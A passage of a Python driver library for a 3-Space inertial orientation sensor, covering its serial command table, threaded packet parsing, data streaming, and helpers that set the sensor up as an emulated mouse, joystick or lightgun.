'beginGyroscopeAutoCalibration': (0xa5, 0, None, 0, None, 1),
'setGyroscopeCalibrationCoefficients': (0xa6, 0, None, 48, '>12f', 1),
'setCalibrationMode': (0xa9, 0, None, 1, '>B', 1),
'getCalibrationMode': (0xaa, 1, '>B', 0, None, 1),
'setOrthoCalibrationDataPointFromCurrentOrientation': (0xab, 0, None, 0, None, 1),
'setOrthoCalibrationDataPointFromVector': (0xac, 0, None, 14, '>BBfff', 1),
'getOrthoCalibrationDataPoint': (0xad, 12, '>fff', 2, '>BB', 1),
'performOrthoCalibration': (0xae, 0, None, 0, None, 1),
'clearOrthoCalibrationData': (0xaf, 0, None, 0, None, 1),
'setSleepMode': (0xe3, 0, None, 1, '>B', 1),
'getSleepMode': (0xe4, 1, '>B', 0, None, 1),
'setJoystickEnabled': (0xf0, 0, None, 1, '>B', 1),
'setMouseEnabled': (0xf1, 0, None, 1, '>B', 1),
'getJoystickEnabled': (0xf2, 1, '>B', 0, None, 1),
'getMouseEnabled': (0xf3, 1, '>B', 0, None, 1),
'setControlMode': (0xf4, 0, None, 3, '>BBB', 1),
'setControlData': (0xf5, 0, None, 7, '>BBBf', 1),
'getControlMode': (0xf6, 1, '>B', 2, '>BB', 1),
'getControlData': (0xf7, 4, '>f', 3, '>BBB', 1),
'setMouseAbsoluteRelativeMode': (0xfb, 0, None, 1, '>B', 1),
'getMouseAbsoluteRelativeMode': (0xfc, 1, '>B', 0, None, 1)
})
reverse_command_dict = dict(map(lambda x: [x[1][0], x[0]], command_dict.items()))
_device_types = ["!BASE"]
def __new__(cls, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
if com_port:
if type(com_port) is str:
port_name = com_port
elif type(com_port) is ComInfo:
port_name = com_port.com_port
else:
_print("An erronous parameter was passed in")
return None
if baudrate not in _allowed_baudrates:
baudrate = _baudrate
_print("Error baudrate value not allowed. Using default.")
serial_port = serial.Serial(port_name, baudrate=baudrate, timeout=0.5, writeTimeout=0.5)
if serial_port is not None:
new_inst = super(_TSSensor, cls).__new__(cls)
return _generateSensorClass(new_inst, serial_port, _TSSensor._device_types)
_print('Error serial port was not made')
def __init__(self, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
self.protocol_args = { 'success_failure': True,
'timestamp': True,
'command_echo': True,
'data_length': True}
if timestamp_mode != TSS_TIMESTAMP_SENSOR:
self.protocol_args['timestamp'] = False
self.timestamp_mode = timestamp_mode
self.baudrate = baudrate
reinit = False
try: # if this attribute already exists, this instance has been initialized before
check = self.stream_parse
reinit = True
# _print("sensor reinit!!!")
except:
self._setupBaseVariables()
self.callback_func = None
self._setupProtocolHeader(**self.protocol_args)
self._setupThreadedReadLoop()
self.latest_lock = threading.Condition(threading.Lock())
self.new_data = False
if reinit:
if self.stream_timing is not None:
self.setStreamingTiming(*self.stream_timing)
if self.stream_slot_cmds is not None:
self.setStreamingSlots(*self.stream_slot_cmds)
def _queueWriteRead(self, rtn_dict, rtn_key, retries, command, input_list=None):
try:
for i in range(retries):
packet = self.writeRead(command, input_list)
if packet[0]:
# _print("##Attempt: {0} complete".format(i))
time.sleep(0.1)
continue
rtn_dict[rtn_key] = packet
break
else:
# _print("sensor failed to succeed")
rtn_dict[rtn_key] = (True, None, None)
except(KeyboardInterrupt):
print('\n! Received keyboard interrupt, quitting threads.\n')
raise KeyboardInterrupt # fix bug where a thread eats the interrupt
def queueWriteRead(self, rtn_dict, rtn_key, retries, command, input_list=None):
return threading.Thread(target=self._queueWriteRead, args=(rtn_dict, rtn_key, retries, command, input_list))
def _generateStreamParse(self):
stream_string = '>'
if self.stream_slot_cmds is None:
self.getStreamingSlots()
for slot_cmd in self.stream_slot_cmds:
if slot_cmd != 'null':
out_struct = self.command_dict[slot_cmd][2]
stream_string += out_struct[1:] # stripping the >
self.stream_parse = struct.Struct(stream_string)
# Set streaming batch command
self.command_dict['_getStreamingBatch'] = (0x54, self.stream_parse.size, stream_string, 0, None, 1)
def _parseStreamData(self, protocol_data, output_data):
rtn_list = self.stream_parse.unpack(output_data)
if len(rtn_list) == 1:
rtn_list = rtn_list[0]
self.latest_lock.acquire()
self.new_data = True
self.latest_lock.notify()
self.latest_lock.release()
data = (protocol_data, rtn_list)
self.stream_last_data = data
if self.record_data:
self.stream_data.append(data)
if self.callback_func:
self.callback_func(data)
def _dataReadLoop(self):
while self.data_loop:
try:
self._readDataWiredProHeader()
except(KeyboardInterrupt):
print('\n! Received keyboard interrupt, quitting threads.\n')
raise KeyboardInterrupt # fix bug where a thread eats the interrupt
except:
# traceback.print_exc()
# _print("bad _parseStreamData parse")
# _print('!!!!!inWaiting = {0}'.format(self.serial_port.inWaiting()))
self._read_data = None
try:
self.read_lock.release()
except:
pass
def _readDataWiredProHeader(self):
_serial_port = self.serial_port
# in_wait = _serial_port.inWaiting()
# if in_wait:
# _print('!666! inWaiting = {0}'.format(in_wait))
header_bytes = _serial_port.read(self.header_parse.size)
if header_bytes:
if self.timestamp_mode == TSS_TIMESTAMP_SENSOR:
header_data = self.header_parse.unpack(header_bytes)
header_list = padProtocolHeader71(header_data)
elif self.timestamp_mode == TSS_TIMESTAMP_SYSTEM:
sys_timestamp = time.clock() # time the packet was parsed; it may have sat in the system buffer a few ms
sys_timestamp *= 1000000
header_data = self.header_parse.unpack(header_bytes)
header_list = padProtocolHeader69(header_data, sys_timestamp)
else:
header_data = self.header_parse.unpack(header_bytes)
header_list = padProtocolHeader69(header_data, None)
fail_byte, timestamp, cmd_echo, ck_sum, rtn_log_id, sn, data_size = header_list
output_data = _serial_port.read(data_size)
if cmd_echo == 0xff:
if data_size:
self._parseStreamData(timestamp, output_data)
return
self.read_lock.acquire()
if len(self.read_queue): # here for a bug in the code
uid, cmd_byte = self.read_queue.popleft()
if cmd_byte == cmd_echo:
self.read_dict[uid] = (header_list, output_data)
self.read_lock.notify() # dies in 3 seconds if there is a writeRead in wait
else:
# _print('Unrequested packet found!!!')
# _hexDump(header_bytes, 'o')
# _hexDump(output_data, 'o')
self.read_queue.appendleft((uid, cmd_byte))
self.read_lock.release()
return
# _print('Unrequested packet found!!!')
# _hexDump(header_bytes, 'o')
# _hexDump(output_data, 'o')
self.read_lock.release()
def getLatestStreamData(self, timeout):
self.latest_lock.acquire()
self.new_data = False
self.latest_lock.wait(timeout)
self.latest_lock.release()
if self.new_data:
return self.stream_last_data
def setNewDataCallBack(self, callback):
self.callback_func = callback
def startRecordingData(self):
self.record_data = True
def stopRecordingData(self):
self.record_data = False
def clearRecordingData(self):
self.stream_data = []
# Convenience functions to replace commands 244(0xf4) and 245(0xf5)
def setGlobalAxis(self, hid_type, config_axis, local_axis, global_axis, deadzone, scale, power):
""" Sets an axis of the desired emulated input device as a 'Global Axis'
style axis. Axes operating under this style use a reference vector
and a consistent local vector to determine the state of the device's
axis. As the local vector rotates, it is projected onto the global
vector. Once the distance of that projection on the global vector
exceeds the inputted "deadzone", the device will begin transmitting
non-zero values for the device's desired axis.
@param hid_type: An integer whose value defines whether the device
in question is a TSS_JOYSTICK or TSS_MOUSE.
@param config_axis: A string whose value may be either 'X' or 'Y'
for a mouse or 'X', 'Y', or 'Z' for a joystick. This string
defines what axis of the device is to be configured.
@param local_axis: A list of 3 Floats whose value is a normalized
Vector3. This vector represents the sensor's local vector to
track.
@param global_axis: A list of 3 Floats whose value is a normalized
Vector3. This vector represents the global vector to project the
local vector onto (should be orthogonal to the local vector).
@param deadzone: A float that defines the minimum distance necessary
for the device's axis to read a non-zero value.
@param scale: A float that defines the linear scale for the values
being returned for the axis.
@param power: A float whose value is an exponential power used to
further modify data being returned from the sensor.
@return: True if the command was successfully written to the device.
False if the command was not written.
"""
# Set class
if hid_type != TSS_JOYSTICK and hid_type != TSS_MOUSE:
_print("Invalid command for hid_type: {0:d}".format(hid_type))
return False
cntl_class = hid_type
# Set index
axis_idx = ["X", "Y", "Z"]
if cntl_class == TSS_MOUSE:
axis_idx.pop(-1)
config_axis = config_axis.upper()
cntl_idx = -1
try:
cntl_idx = axis_idx.index(config_axis)
except:
_print("Invalid command for config_axis: {0:s}".format(config_axis))
return False
# Set mode
if not self.setControlMode(cntl_class, cntl_idx, 0):
return False
# Create data array
data_array = local_axis + global_axis + [deadzone, scale, power]
# Set data
for i in range(len(data_array)):
if not self.setControlData(cntl_class, cntl_idx, i, data_array[i]):
return False
return True
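# Usage sketch (an added illustration; the numbers are only an example):
# configure a joystick X axis that tracks the sensor's local X vector against
# the global down vector, assuming `sensor` is an already-created instance:
#   sensor.setGlobalAxis(TSS_JOYSTICK, "X", [1, 0, 0], [0, 0, -1],
#                        0.1, 1.0, 1.0)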
def setScreenPointAxis(self, hid_type, config_axis, dist_from_screen, dist_on_axis, collision_component, sensor_dir, button_halt):
""" Sets an axis of the desired emulated input device as a 'Screen Point
Axis' style axis. An axis operating under this style projects a
vector along the sensor's direction vector into a mathematical plane.
The collision point on the plane is then used to determine what the
device's axis's current value is. The direction vector is rotated
based on the orientation of the sensor.
@param hid_type: An integer whose value defines whether the device
in question is a TSS_JOYSTICK or TSS_MOUSE.
@param config_axis: A string whose value may be either 'X' or 'Y'
for a mouse or 'X', 'Y', or 'Z' for a joystick. This string
defines what axis of the device is to be configured.
@param dist_from_screen: A float whose value is the real world
distance the sensor is from the user's screen. Must be the same
units as dist_on_axis.
@param dist_on_axis: A float whose value is the real world length of
the axis along the user's screen (width of screen for x-axis,
height of screen for y-axis). Must be the same units as
dist_from_screen.
@param collision_component: A string whose value may be 'X', 'Y', or
'Z'. This string defines what component of the look vector's
collision point on the virtual plane to use for manipulating the
device's axis.
@param sensor_dir: A string whose value may be 'X', 'Y', or 'Z'.
This string defines which of the sensor's local axis to use for
creating the vector to collide with the virtual plane.
@param button_halt: A float whose value is a pause time in
milliseconds. When a button is pressed on the emulated device,
transmission of changes to the axis is paused for the inputted
amount of time to prevent undesired motion detection when
pressing buttons.
@return: True if the command was successfully written to the device.
False if the command was not written.
"""
# Set class
if hid_type != TSS_JOYSTICK and hid_type != TSS_MOUSE:
_print("Invalid command for hid_type: {0:d}".format(hid_type))
return False
cntl_class = hid_type
# Set index
axis_idx = ["X", "Y", "Z"]
if cntl_class == TSS_MOUSE:
axis_idx.pop(-1)
config_axis = config_axis.upper()
cntl_idx = -1
try:
cntl_idx = axis_idx.index(config_axis)
except:
_print("Invalid command for config_axis: {0:s}".format(config_axis))
return False
# Set mode
if not self.setControlMode(cntl_class, cntl_idx, 1):
return False
# Create data array
axis_idx = ["X", "Y", "Z"]
data_array = []
data_array.append(dist_from_screen)
data_array.append(dist_on_axis)
collision_component = collision_component.upper()
try:
data_array.append(axis_idx.index(collision_component))
except:
_print("Invalid command for collision_component: {0:s}".format(collision_component))
return False
sensor_dir = sensor_dir.upper()
try:
data_array.append(axis_idx.index(sensor_dir))
except:
_print("Invalid command for sensor_dir: {0:s}".format(sensor_dir))
return False
data_array.append(0)
data_array.append(0)
data_array.append(0)
data_array.append(button_halt)
data_array.append(0)
data_array.append(0)
# Set data
for i in range(len(data_array)):
if not self.setControlData(cntl_class, cntl_idx, i, data_array[i]):
return False
return True
def disableAxis(self, hid_type, config_axis):
""" Disables an axis on the passed in device.
@param hid_type: An integer whose value defines whether the device
in question is a TSS_JOYSTICK or TSS_MOUSE.
@param config_axis: A string whose value may be either 'X' or 'Y'
for a mouse or 'X', 'Y', or 'Z' for a joystick. This string
defines what axis of the device is to be configured.
@return: True if the command was successfully written to the device.
False if the command was not written.
"""
# Set class
if hid_type != TSS_JOYSTICK and hid_type != TSS_MOUSE:
_print("Invalid command for hid_type: {0:d}".format(hid_type))
return False
cntl_class = hid_type
# Set index
axis_idx = ["X", "Y", "Z"]
if cntl_class == TSS_MOUSE:
axis_idx.pop(-1)
config_axis = config_axis.upper()
cntl_idx = -1
try:
cntl_idx = axis_idx.index(config_axis)
except:
_print("Invalid command for config_axis: {0:s}".format(config_axis))
return False
# Set mode
return self.setControlMode(cntl_class, cntl_idx, 255)
def setPhysicalButton(self, hid_type, button_idx, button_bind):
""" Binds a sensor's physical button to an emulated device's button.
@param hid_type: An integer whose value defines whether the device
in question is a TSS_JOYSTICK or TSS_MOUSE.
@param button_idx: An integer whose value defines which button on
the emulated device to configure. Default range is 0 through 7.
@param button_bind: An integer whose value defines which physical
button to bind to the emulated device's button to as defined by
button_idx, either TSS_BUTTON_LEFT or TSS_BUTTON_RIGHT.
@return: True if the command was successfully written to the device.
False if the command was not written.
"""
# Set class
if hid_type != TSS_JOYSTICK and hid_type != TSS_MOUSE:
_print("Invalid command for hid_type: {0:d}".format(hid_type))
return False
cntl_class = 1 + hid_type
# Set mode
if not self.setControlMode(cntl_class, button_idx, 0):
return False
# Create data
if button_bind != TSS_BUTTON_LEFT and button_bind != TSS_BUTTON_RIGHT:
_print("Invalid command for button_bind: {0:d}".format(button_bind))
return False
data = button_bind
# Set data
return self.setControlData(cntl_class, button_idx, 0, data)
def setOrientationButton(self, hid_type, button_idx, local_axis, global_axis, max_dist):
""" Sets up a device's button such that it is 'pressed' when a reference
vector aligns itself with a local vector.
@param hid_type: An integer whose value defines whether the device
in question is a TSS_JOYSTICK or TSS_MOUSE.
@param button_idx: An integer whose value defines which button on
the emulated device to configure. Default range is 0 through 7.
@param local_axis: A list of 3 floats whose value represents a
normalized Vector3. This vector represents the sensor's local
vector to track.
@param global_axis: A list of 3 floats whose value is a normalized
Vector3. This vector represents the global vector to move the
local vector towards for "pressing" (should not be collinear to
the local vector).
@param max_dist: A float whose value defines how close the local
vector's orientation must be to the global vector for the button
to be 'pressed'.
@return: True if the command was successfully written to the device.
False if the command was not written.
"""
# Set class
if hid_type != TSS_JOYSTICK and hid_type != TSS_MOUSE:
_print("Invalid command for hid_type: {0:d}".format(hid_type))
return False
cntl_class = 1 + hid_type
# Set mode
if not self.setControlMode(cntl_class, button_idx, 1):
return False
# Create data array
data_array = local_axis + global_axis + [max_dist]
# Set data
for i in range(7):
if not self.setControlData(cntl_class, button_idx, i, data_array[i]):
return False
return True
def setShakeButton(self, hid_type, button_idx, threshold):
""" Sets up an emulated device's button such that it is 'pressed' when
the sensor is shaken.
@param hid_type: An integer whose value defines whether the device
in question is a TSS_JOYSTICK or TSS_MOUSE.
@param button_idx: An integer whose value defines which button on
the emulated device to configure. Default range is 0 through 7.
@param threshold: A float whose value defines how many Gs of force
must be experienced by the sensor before the button is
'pressed'.
@return: True if the command was successfully written to the device.
False if the command was not written.
"""
# Set class
if hid_type != TSS_JOYSTICK and hid_type != TSS_MOUSE:
_print("Invalid command for hid_type: {0:d}".format(hid_type))
return False
cntl_class = 1 + hid_type
# Set mode
if not self.setControlMode(cntl_class, button_idx, 2):
return False
# Create data array
data_array = [0, 0, 0, threshold]
# Set data
for i in range(4):
if not self.setControlData(cntl_class, button_idx, i, data_array[i]):
return False
return True
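# Usage sketch (an added illustration; the threshold value is only an
# example): bind the sensor's physical left button to emulated joystick
# button 0 and make button 2 trigger when the sensor is shaken:
#   sensor.setPhysicalButton(TSS_JOYSTICK, 0, TSS_BUTTON_LEFT)
#   sensor.setShakeButton(TSS_JOYSTICK, 2, 1.5)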
def disableButton(self, hid_type, button_idx):
""" Disables a button on the passed in emulated device.
@param hid_type: An integer whose value defines whether the device
in question is a TSS_JOYSTICK or TSS_MOUSE.
@param button_idx: An integer whose value defines which button on
the emulated device to configure. Default range is 0 through 7.
@return: True if the command was successfully written to the device.
False if the command was not written.
"""
# Set class
if hid_type != TSS_JOYSTICK and hid_type != TSS_MOUSE:
_print("Invalid command for hid_type: {0:d}".format(hid_type))
return False
cntl_class = 1 + hid_type
# Set mode
return self.setControlMode(cntl_class, button_idx, 255)
# Convenience functions for setting up simple mouse/joystick implementations
def setupSimpleMouse(self, diagonal_size, dist_from_screen, aspect_ratio, is_relative=True):
""" Creates a simple emulated mouse device using the features of the
sensor. Left button and right button emulate the mouse's left and
right buttons respectively, and using the sensor as a pointing device
with the front of the device facing towards the screen will move the
mouse cursor.
@param diagonal_size: A float whose value is the real world diagonal
size of the user's screen.
@param dist_from_screen: A float whose value is the real world
distance the sensor is from the user's screen. Must be the same
units as diagonal_size.
@param aspect_ratio: A float whose value is the real world aspect
ratio of the user's screen.
@param is_relative: A boolean whose value expresses whether the
mouse is to operate in relative mode (True) or absolute mode
(False).
@return: True if the command was successfully written to the device.
False if the command was not written.
"""
cur_mouse_rel = self.getMouseAbsoluteRelativeMode()
if cur_mouse_rel != is_relative:
if self.setMouseAbsoluteRelativeMode(is_relative):
fail_byte, t_stamp, data = self.writeRead('softwareReset')
if not fail_byte:
while self.getSerialNumber():
pass
self.close()
time.sleep(5)
while not self.reconnect():
pass
unit_hyp = (aspect_ratio ** 2 + 1) ** 0.5
screen_multiplyer = diagonal_size / unit_hyp
screen_width = screen_multiplyer * aspect_ratio
screen_height = screen_multiplyer
_print("Height: {0:2f}".format(screen_height))
_print("Width: {0:2f}".format(screen_width))
self.setScreenPointAxis(TSS_MOUSE, "X", dist_from_screen, screen_width, "X", "Z", 50)
self.setScreenPointAxis(TSS_MOUSE, "Y", dist_from_screen, screen_height, "Y", "Z", 50)
self.setPhysicalButton(TSS_MOUSE, 0, TSS_BUTTON_LEFT)
self.setPhysicalButton(TSS_MOUSE, 1, TSS_BUTTON_RIGHT)
self.disableButton(TSS_MOUSE, 2)
self.disableButton(TSS_MOUSE, 3)
self.disableButton(TSS_MOUSE, 4)
self.disableButton(TSS_MOUSE, 5)
self.disableButton(TSS_MOUSE, 6)
self.disableButton(TSS_MOUSE, 7)
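# Usage sketch (an added illustration; the screen measurements are only an
# example and both distances must share the same units):
#   sensor.setupSimpleMouse(23.0, 30.0, 16.0 / 9.0, is_relative=True)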
def setupSimpleJoystick(self, deadzone, scale, power, shake_threshold, max_dist):
""" Creates a simple emulated joystick device using the features of the
sensor. The left and right physical buttons on the sensor act as
buttons 0 and 1 for the joystick. Button 2 is a shake button.
Buttons 3 and 4 are pressed when the sensor is rotated +-90 degrees
on the Z-axis. Rotations on the sensor's Y and X axis correspond to
movements on the joystick's X and Y axis.
@param deadzone: A float that defines the minimum distance necessary
for the device's axis to read a non-zero value.
@param scale: A float that defines the linear scale for the values
being returned for the axis.
@param power: A float whose value is an exponential power used to
further modify data being returned from the sensor.
@param shake_threshold: A float whose value defines how many Gs of
force must be experienced by the sensor before the button 2 is
'pressed'.
@param max_dist: A float whose value defines how close the local
vector's orientation must be to the global vector for buttons 3
and 4 to be "pressed".
@return: True if the command was successfully written to the device.
False if the command was not written.
"""
self.setGlobalAxis(TSS_JOYSTICK, "X", [1, 0, 0], [0, 0, -1], deadzone, scale, power)
self.setGlobalAxis(TSS_JOYSTICK, "Y", [0, 1, 0], [0, 0, -1], deadzone, scale, power)
self.setPhysicalButton(TSS_JOYSTICK, 0, TSS_BUTTON_LEFT)
self.setPhysicalButton(TSS_JOYSTICK, 1, TSS_BUTTON_RIGHT)
self.setShakeButton(TSS_JOYSTICK, 2, shake_threshold)
self.setOrientationButton(TSS_JOYSTICK, 3, [0, 1, 0], [-1, 0, 0], max_dist)
self.setOrientationButton(TSS_JOYSTICK, 4, [0, 1, 0], [1, 0, 0], max_dist)
self.disableButton(TSS_JOYSTICK, 5)
self.disableButton(TSS_JOYSTICK, 6)
self.disableButton(TSS_JOYSTICK, 7)
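# Usage sketch (an added illustration; the numbers are only an example):
#   sensor.setupSimpleJoystick(deadzone=0.1, scale=1.0, power=1.0,
#                              shake_threshold=1.5, max_dist=0.2)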
# LightGun Functions
def setupSimpleLightgun(self, diagonal_size, dist_from_screen, aspect_ratio, is_relative=True):
""" Creates a simple emulated mouse based lightgun device using the
features of the sensor. Left button of the sensor emulates the
mouse's left button. Shaking the sensor emulates the mouse's right
button. This configuration uses the sensor as a pointing device; with
the front of the device facing towards the screen, it will move the
mouse cursor.
@param diagonal_size: A float whose value is the real world diagonal
size of the user's screen.
@param dist_from_screen: A float whose value is the real world
distance the sensor is from the user's screen. Must be the same
units as diagonal_size.
@param aspect_ratio: A float whose value is the real world aspect
ratio of the user's screen.
@param is_relative: A boolean whose value expresses whether the
mouse is to operate in relative mode (True) or absolute mode
(False).
@return: True if the command was successfully written to the device.
False if the command was not written.
"""
cur_mouse_rel = self.getMouseAbsoluteRelativeMode()
if cur_mouse_rel != is_relative:
if self.setMouseAbsoluteRelativeMode(is_relative):
fail_byte, t_stamp, data = self.writeRead('softwareReset')
if not fail_byte:
while self.getSerialNumber():
pass
self.close()
time.sleep(5)
while not self.reconnect():
pass
unit_hyp = (aspect_ratio ** 2 + 1) ** 0.5
screen_multiplyer = diagonal_size / unit_hyp
screen_width = screen_multiplyer * aspect_ratio
screen_height = screen_multiplyer
_print("Height: {0:2f}".format(screen_height))
_print("Width: {0:2f}".format(screen_width))
self.setScreenPointAxis(TSS_MOUSE, "X", dist_from_screen, screen_width, "X", "Z", 50)
self.setScreenPointAxis(TSS_MOUSE, "Y", dist_from_screen, screen_height, "Y", "Z", 50)
self.setPhysicalButton(TSS_MOUSE, 0, TSS_BUTTON_LEFT)
self.setShakeButton(TSS_MOUSE, 1, 1.0)
self.disableButton(TSS_MOUSE, 2)
self.disableButton(TSS_MOUSE, 3)
self.disableButton(TSS_MOUSE, 4)
self.disableButton(TSS_MOUSE, 5)
self.disableButton(TSS_MOUSE, 6)
self.disableButton(TSS_MOUSE, 7)
## 80(0x50)
def setStreamingSlots(self, slot0='null',
slot1='null',
slot2='null',
slot3='null',
slot4='null',
slot5='null',
slot6='null',
slot7='null'):
slots = [slot0, slot1, slot2, slot3, slot4, slot5, slot6, slot7]
slot_bytes = []
for slot in slots:
cmd_byte = self.command_dict[slot][0]
slot_bytes.append(cmd_byte)
fail_byte, timestamp, filler = self.writeRead('_setStreamingSlots', slot_bytes)
self.stream_slot_cmds = slots
self._generateStreamParse()
return not fail_byte
## 81(0x51)
def getStreamingSlots(self):
if self.stream_slot_cmds is None:
self.stream_slot_cmds = ['null'] * 8
fail_byte, timestamp, slot_bytes = self.writeRead('_getStreamingSlots')
need_update = False
if slot_bytes:
for slot_idx in range(len(self.stream_slot_cmds)):
cmd_byte = slot_bytes[slot_idx]
cmd_string = self.reverse_command_dict[cmd_byte]
if self.stream_slot_cmds[slot_idx] != cmd_string:
self.stream_slot_cmds[slot_idx] = cmd_string
need_update = True
if need_update:
self._generateStreamParse()
return self.stream_slot_cmds
## 82(0x52)
def setStreamingTiming(self, interval, duration, delay, timestamp=False):
arg_list = (interval, duration, delay)
fail_byte, t_stamp, data = self.writeRead('_setStreamingTiming', arg_list)
if not fail_byte:
self.stream_timing = arg_list
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 83(0x53)
def getStreamingTiming(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('_getStreamingTiming')
if data:
self.stream_timing = data
if timestamp:
return (data, t_stamp)
return data
## 84(0x54)
def getStreamingBatch(self, timestamp=False):
if self.stream_parse is None:
self._generateStreamParse()
fail_byte, t_stamp, data = self.writeRead('_getStreamingBatch')
if timestamp:
return (data, t_stamp)
return data
## 85(0x55)
def stopStreaming(self):
self.record_data = False
fail_byte, timestamp, slot_bytes = self.writeRead('stopStreaming')
return not fail_byte
## 86(0x56)
def startStreaming(self, start_record=False):
self.record_data = start_record
if self.stream_parse is None:
self._generateStreamParse()
fail_byte, timestamp, slot_bytes = self.writeRead('startStreaming')
return not fail_byte
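# Streaming usage sketch (an added illustration, not part of the original
# file; the timing values are only an example and follow the
# interval/duration/delay argument order of setStreamingTiming):
#   sensor.setStreamingSlots('getTaredOrientationAsQuaternion',
#                            'getNormalizedGyroRate')
#   sensor.setStreamingTiming(10000, 0xffffffff, 0)
#   sensor.startStreaming()
#   sample = sensor.getLatestStreamData(timeout=1.0)
#   sensor.stopStreaming()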
## generated functions USB and WL_ and EM_ and DL_ and BT_
## 0(0x00)
def getTaredOrientationAsQuaternion(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTaredOrientationAsQuaternion')
if timestamp:
return (data, t_stamp)
return data
## 1(0x01)
def getTaredOrientationAsEulerAngles(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTaredOrientationAsEulerAngles')
if timestamp:
return (data, t_stamp)
return data
## 2(0x02)
def getTaredOrientationAsRotationMatrix(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTaredOrientationAsRotationMatrix')
if timestamp:
return (data, t_stamp)
return data
## 3(0x03)
def getTaredOrientationAsAxisAngle(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTaredOrientationAsAxisAngle')
if timestamp:
return (data, t_stamp)
return data
## 4(0x04)
def getTaredOrientationAsTwoVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTaredOrientationAsTwoVector')
if timestamp:
return (data, t_stamp)
return data
## 5(0x05)
def getDifferenceQuaternion(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getDifferenceQuaternion')
if timestamp:
return (data, t_stamp)
return data
## 6(0x06)
def getUntaredOrientationAsQuaternion(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUntaredOrientationAsQuaternion')
if timestamp:
return (data, t_stamp)
return data
## 7(0x07)
def getUntaredOrientationAsEulerAngles(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUntaredOrientationAsEulerAngles')
if timestamp:
return (data, t_stamp)
return data
## 8(0x08)
def getUntaredOrientationAsRotationMatrix(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUntaredOrientationAsRotationMatrix')
if timestamp:
return (data, t_stamp)
return data
## 9(0x09)
def getUntaredOrientationAsAxisAngle(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUntaredOrientationAsAxisAngle')
if timestamp:
return (data, t_stamp)
return data
## 10(0x0a)
def getUntaredOrientationAsTwoVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUntaredOrientationAsTwoVector')
if timestamp:
return (data, t_stamp)
return data
## 11(0x0b)
def getTaredTwoVectorInSensorFrame(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTaredTwoVectorInSensorFrame')
if timestamp:
return (data, t_stamp)
return data
## 12(0x0c)
def getUntaredTwoVectorInSensorFrame(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUntaredTwoVectorInSensorFrame')
if timestamp:
return (data, t_stamp)
return data
## 16(0x10)
def setEulerAngleDecompositionOrder(self, angle_order, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setEulerAngleDecompositionOrder', angle_order)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 17(0x11)
def setMagnetoresistiveThreshold(self, threshold, trust_frames, lockout_decay, perturbation_detection_value, timestamp=False):
arg_list = (threshold, trust_frames, lockout_decay, perturbation_detection_value)
fail_byte, t_stamp, data = self.writeRead('setMagnetoresistiveThreshold', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 18(0x12)
def setAccelerometerResistanceThreshold(self, threshold, lockout_decay, timestamp=False):
arg_list = (threshold, lockout_decay)
fail_byte, t_stamp, data = self.writeRead('setAccelerometerResistanceThreshold', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 19(0x13)
def offsetWithCurrentOrientation(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('offsetWithCurrentOrientation')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 20(0x14)
def resetBaseOffset(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('resetBaseOffset')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 21(0x15)
def offsetWithQuaternion(self, quaternion, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('offsetWithQuaternion', quaternion)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 22(0x16)
def setBaseOffsetWithCurrentOrientation(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setBaseOffsetWithCurrentOrientation')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 32(0x20)
def getAllNormalizedComponentSensorData(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAllNormalizedComponentSensorData')
if timestamp:
return (data, t_stamp)
return data
## 33(0x21)
def getNormalizedGyroRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getNormalizedGyroRate')
if timestamp:
return (data, t_stamp)
return data
## 34(0x22)
def getNormalizedAccelerometerVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getNormalizedAccelerometerVector')
if timestamp:
return (data, t_stamp)
return data
## 35(0x23)
def getNormalizedCompassVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getNormalizedCompassVector')
if timestamp:
return (data, t_stamp)
return data
## 37(0x25)
def getAllCorrectedComponentSensorData(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAllCorrectedComponentSensorData')
if timestamp:
return (data, t_stamp)
return data
## 38(0x26)
def getCorrectedGyroRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCorrectedGyroRate')
if timestamp:
return (data, t_stamp)
return data
## 39(0x27)
def getCorrectedAccelerometerVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCorrectedAccelerometerVector')
if timestamp:
return (data, t_stamp)
return data
## 40(0x28)
def getCorrectedCompassVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCorrectedCompassVector')
if timestamp:
return (data, t_stamp)
return data
## 41(0x29)
def getCorrectedLinearAccelerationInGlobalSpace(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCorrectedLinearAccelerationInGlobalSpace')
if timestamp:
return (data, t_stamp)
return data
## 43(0x2b)
def getTemperatureC(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTemperatureC')
